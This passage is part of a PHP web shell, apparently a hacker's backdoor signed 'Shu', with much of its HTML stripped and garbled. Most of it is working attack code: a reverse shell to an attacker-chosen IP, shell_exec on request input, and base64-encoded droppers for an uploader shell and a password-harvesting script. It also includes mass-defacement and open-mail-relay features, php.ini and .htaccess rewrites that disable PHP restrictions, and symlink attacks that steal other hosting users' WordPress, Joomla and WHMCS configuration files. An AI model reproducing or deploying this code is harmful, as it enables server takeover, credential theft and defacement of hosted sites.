ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);} if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;} } //////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?>

mail to

from

subject

: ".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "

Filename	".$file."
Size	".ukuran($file)."
Permission	".get_perms($file)."
Owner	".$owner."
Create time	".date("d-M-Y H:i",@filectime($file))."
Last modified	".date("d-M-Y H:i",@filemtime($file))."
Last accessed	".date("d-M-Y H:i",@fileatime($file))."
Actions	edit \| rename \| delete \| download (gzip)
View	text \| code \| image

"; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "

"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "

"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "

"; } else { echo "

"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "

"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved @ ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>

Password Hash

'; echo '

'; echo ''; echo ''; echo '
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
Password Hash
Input here : '; echo ''; echo '
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5
'; } // symlink function elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { ?>
Symlink Server

"; @mkdir('shu',0777); $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('shu/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','shu/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo "

"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','nginx1337/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; $malay = '\.my'; $china = '\.cn'; $japan = '\.jp'; $austr = '\.au'; $porn = '\.xxx'; $as = '\.uk'; $calfn = '\.ca'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) { $name = "
".$string[1][0].'
'; } echo " "; flush(); } } } } echo "
Domains Users symlink

'.$name.'
'.$UID['name']." Symlink
"; } // config grabber elseif(isset($_GET['x']) && ($_GET['x'] == 'config')) { ?>
ConfKiller

"; mkdir('pwnz', 0755); chdir('pwnz'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Error Bajingan !!!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cpc AddHandler cgi-script .cc AddHandler cgi-script .cc"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $file = fopen("grab.cc" ,"w+"); $write = fwrite ($file ,base64_decode($configshell)); fclose($file); chmod("grab.cc",0755); echo "
"; } /////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass')) { ?>
Command Bypass Exploit
"; print_r('
root@inori:~#
Menu Bypass :
'); ini_restore("safe_mode"); ini_restore("open_basedir"); $liz0=shell_exec($_POST[baba]); $liz0zim=shell_exec($_POST[liz0]); $uid=shell_exec('id'); $server=shell_exec('uname -a'); echo "
"; echo $liz0; echo $liz0zim; echo "
"; "

Password Hash
Input here :	'; echo ''; echo '
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5

"; } //////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')) { ?>

Local Domain Viewer

'; $file = @implode(@file("/etc/named.conf")); if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } preg_match_all("#named/(.*?).db#",$file ,$r); $domains = array_unique($r[1]); //check(); //if(isset($_GET['ShowAll'])) { echo ""; foreach($domains as $domain){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); echo ""; } echo "

[+] There are : [ ".count($domains)." ] Domain

Domain User
$domain ".$user['name']."
"; } echo '
'; } ////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "

Mass Directory
"; error_reporting(0);?>

Folder

file name

hacked code
<html><title>owned by shu1337</title><center>Even if I'm just a fake.. To me, I'm the only.. real one!<br><b>Hacked by Shu</b></center></html>

Done

";}}} //////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'jembut')) { ?>
$user) Password is ($pass)
"; $ok++; } } } } echo "
You Found $ok Cpanel by Shu"; echo "BACK"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['HTTP_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg=="; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic='; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo" "; system("python cp.py $url config"); unlink ('cp.py'); echo" "; echo "
BACK"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "
DONE!"; echo "
BACK"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; //all function here function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); 